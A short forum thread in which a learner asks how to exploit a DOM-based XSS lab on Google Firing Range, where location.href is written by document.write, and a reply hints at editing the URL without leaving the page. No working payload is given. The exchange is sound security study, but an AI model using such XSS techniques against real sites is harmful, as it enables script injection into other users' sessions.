DOMXSS - how to exploit this lab?

I’ve been using the Google Firing Range site to learn about DOMXSS vulnerabilities. However, I’ve come across one that I can’t seem to solve:

  var payload = window.location.href;

The source is location.href and the sink is document.write. How can an attacker control location.href? If anyone could help me solve/understand this, I would really appreciate it.


You can play with URL without leave the current page. :slight_smile:

For example,

-> all of them is same page and location.href will see ‘payload’ . :wink:

1 Like

But how can I get alert(1)?